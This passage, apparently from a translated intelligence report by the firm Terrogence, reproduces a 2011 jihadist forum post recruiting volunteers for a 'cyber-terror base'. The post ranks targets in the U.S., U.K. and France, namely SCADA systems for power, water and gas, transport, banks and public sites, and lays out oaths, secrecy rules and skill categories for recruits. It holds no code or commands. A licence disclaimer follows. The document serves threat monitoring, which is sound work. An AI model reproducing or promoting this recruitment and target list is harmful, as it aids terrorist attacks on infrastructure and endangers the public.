this is quite expected. But do not worry, since they will be eventually uncovered and suffer

unexpected blows. This may be another advantage of this project and the new terrorist base.


1. The new terrorist bases tasks and priorities:

Simply put, it is a cyber-terror base, for staunching electronic terror attacks on major infidel powers,

specifically the U.S., the U.K. and France, no others. This base is not to attack, for instance, the sites

of Shia, Christians, apostates, slanderers, liars sites and forums, or anything else. I repeat: it will

only target the U.S., U.K. and France.

These are the targets of the future attacks, in order of priority:

SCADA systems, in order to destroy power, water and gas supply lines, airports, railway

stations, underground train stations, as well as central command and control systems in

these three infidel countries, in the aforementioned order.

Control systems of general financial sites, such as central saving organizations, stock

markets, and major banks.

Sites and databases of major corporations controlling the infidel countries economy.

Public sites affecting the citizens daily routine, in order to maximize the terror effects on the

population.

2. The general requirements of the male and female volunteer terrorists:

Wholehearted devotion to Allah, reliance on Him, and absolute conviction that ones actions

are a fight for Allahs Cause. One must never have the slightest doubt of the Islamic

legitimacy of it, and believe this is ones personal duty, if he is capable of it.

Keeping it secret, without ever mentioning it, not even to ones closest relatives, such as

spouse, household, children, or parents. One's should never boasting of his capability,

despite any provocations or accusations, or even if this matter is discussed in ones

presence.

Making time for practicing this project, and not being diverted by anything else. In case it

interferes with other occupations, electronic Jihad should have priority, and one should vow

this to God.

Keeping ones promise and pledge, without any slackening, under any excuse whatsoever.

Whoever suspects that certain matters may prevent him from doing so, he should not

volunteer, since he have thousands of other ways to support Jihad and Jihadists, and Allah

will reward him.

Once a target and a tactic is selected, one may never withdraw or oppose it, or express other

views, just get to work resolutely and forcefully, immediately carrying out any assignment,

following all detains and manner of operation, at all cost. Since he is in the battlefield, any

retreat or slackening is just like turning his back in a day of attack.

Finally, one must have a totally unlimited and unrestricted access to a computer with an

Internet connection.


3. The categories and fields of capabilities required of the terrorists:

Everyone accepting the general requirements, and wants to volunteer, should choose at least one of

the following categories which totally fit ones capabilities, without the slightest overestimation of

ones capabilities. In case of any doubt, let one choose the lesser capability. Please notice that any

higher-level category does not necessarily contain all the lower-level categories.

A proper understanding of how to hack SCADA systems.

A proper understanding of SCADA systems, without knowledge of hacking methods.

Acquaintance with writing hacking programs and scripts using lower-level languages such as

Machine l a n g u a g e or Assemply l a n g u a g e [misspelling is in the original-TG]

Absolute mastering of programming in C, C+ and C++ languages.

A highly professional acquaintance with high-level Object Oriented programming languages.

Expertise in networks, communication protocols, and various kinds of routers and firewalls,

especially CISCO.

Expertise in Linux or Unix operating systems, or both systems, and capability of easily

operating as a system manager for a server operated by these systems.

Expertise in Windows operating system and can easily serve as a system manager for a one

of the servers operated by these systems.

Expertise in information-security systems.

Proper acquaintance with testing programs and operating systems, and capability of

detecting their security vulnerabilities.

A proper understanding of the meaning of hacking and how to use the tools and software

for detecting the vulnerabilities of sites such as using the available tools for hacking, but with

no capability of making such tools.

A proper understanding of the meaning of hacking and how it is done, but lack of knowledge

on ways to obtain available tools, software or scripts to check a site he plans to hack. But, if

the necessary tools are obtained, he has the capability of hacking, unaided, a website with

any vulnerability.

A proper understanding of the meaning of hacking and how it is done, but lack of knowledge

on how to use the necessary tools without an explanation from another person.

A proper acquaintance with hackers Websites, capability of entering them easily, searching

for required scripts, tools, or software, and provide them to ones fellows, if asked for it.

A proper understanding of the communication protocols TCP/IP on the internet, including

the seven layers of the protocol and the way they interact, as well as subsequent services

such as DHCP and DNS. In addition, he needs to be acquaintance with the IP, but with no

experience in hacking.

Complete mastering of English or French scientific language and scientific background in

computer engineering. Capability of self-learning under the proper guidance from

publications in one of these languages, but with none of the aforementioned capabilities.

Mastering of Russian language.

Mastering of Chinese language.


None of the aforementioned categories, but full, fearless, undeterred readiness, to operate

on his PC a program provided by the terrorist base, letting it operate according to future

orders, following them precisely, with no fear from the consequences of the programs

operation. The programs MO shall be explained to such an operative, if he is ready to trust

it without any doubts, and operate it following the instructions precisely.

Now, those male and female terrorists who wish to volunteer should post a response in this thread,

made of two parts, even using the copy-paste option:

I swear to Allah that I fully accept the general conditions, and fully meet the general

requirements. I swear, before Allah, to comply with everything.

I fit into the following category or categories. Now copy-paste what fits your capabilities, if

you find any.

May Allah bless all our dear supporters.

I remind everybody unwilling or unable to participate to settle for praying for his fellows.

I also remind all male and female terrorists who wish to volunteer, they must follow this threads

contents precisely, in order to make it meet its objectives, by the will of Osamas and Aymans Lord.

Allah masters our intentions and guides our way,

Brother Yaman Mukhaddab,

10th of Rajab 1432 AH, 11th of June 2011


Disclaimer and Limitation of Liability

Copyright and License of Product

This report (the Product) is the property of Terrogence Ltd. and is protected by Israel and international copyright law and conventions.

User acknowledges that access to the Product is limited to the License terms set forth herein and any expansion must be in writing. The

granting of the License to access and use the Product is conditioned on User's agreement not to disclose, copy, disseminate, redistribute,

or publish the Product, or any portion of or excerpts thereof to any other party.

User shall have the right to use the Product solely for its own internal information purposes. Reproduction of the Product in any form or by

any means is forbidden without Terrogence's written permission.

User agrees to maintain all copyright, trademark and other notices contained in the Product. User agrees that it shall not use Terrogence's

name or any excerpts from the Product in the promotion of its products or services.

Disclaimer of Warranties

Terrogence does not make any warranties, express or implied, including, without limitation, those of merchantability and fitness for a

particular purpose, with respect to the Product. Although Terrogence takes reasonable steps to screen the Product for infection by viruses,

worms, Trojan horses or other code manifesting contaminating or destructive properties before making the Product available, Terrogence

cannot guarantee that the Product will be free of infection. Terrogence does not make any warranties, express or implied, of whatsoever

nature with respect to the Product or to the accuracy of any conclusions set out in the Product.

Accuracy of Information

The information contained in the Product has been obtained from sources believed to be reliable and are provided by Terrogence on an

"as is" basis. To the full extent permissible by applicable law, Terrogence disclaims all warranties, express or implied, of whatsoever nature

including, but not limited to any warranties as to the accuracy, completeness, quality or adequacy of any such information, any

conclusions set out in the Product and any translations in the Product. The reader assumes sole responsibility for the selection of the

Product to achieve its intended results. The opinions expressed in the Product are subject to change at any time without notice.

Limitation of Liability

To the extent permitted under applicable law, in no event will Terrogence be liable in any way for:

1. damages of any kind, including without limitation, direct, incidental punitive, special or consequential damages (including, but

not limited to, damages for lost profits, business interruption and loss of programs or information) arising out of the use of or

inability to use the Product, or any information provided in the Product, ;regardless of whether or not Terrogence has been

advised of the possibility of such damages;

2. any claim attributable to errors, omissions or other inaccuracies in the Product or interpretations thereof; and

3. actions taken or not taken by any person or entity as a result of the review by such person or entity of the Product or

information contained therein or as a result of the interpretation of the Product or information contained therein by such

person or entity.

Indemnification

User agrees to indemnify, defend and hold harmless Terrogence, its affiliates, licensors, and their respective officers, directors, employees

and agents from and against all losses, expenses, damages and costs, including reasonable .attorneys' fees, arising out of the use of the

Product by User or User's account.

Third Party Rights

The provisions regarding Disclaimer of Warranty, Limitation of Liability and Indemnification are for the benefit of Terrogence, and its

licensors, employees and agents. Each shall have the right to assert and enforce those provisions against a User.

General Provisions

Any provision in any memorandum received by Terrogence in connection with the Product which is inconsistent with, or adds to, the

provisions of this Agreement is void. Neither the parties' course of conduct or trade practice will modify the terms of this Agreement. If

any provision of this Agreement is determined by a court of competent jurisdiction to be invalid, all other terms and conditions shall

remain in full force and effect.

Governing Law

This Agreement and the resolution of any dispute arising hereunder shall all be governed and construed in accordance with the laws of the

state of Israel, without regard to its conflicts of law principles. User consents to the jurisdiction of the courts of Tel-Aviv.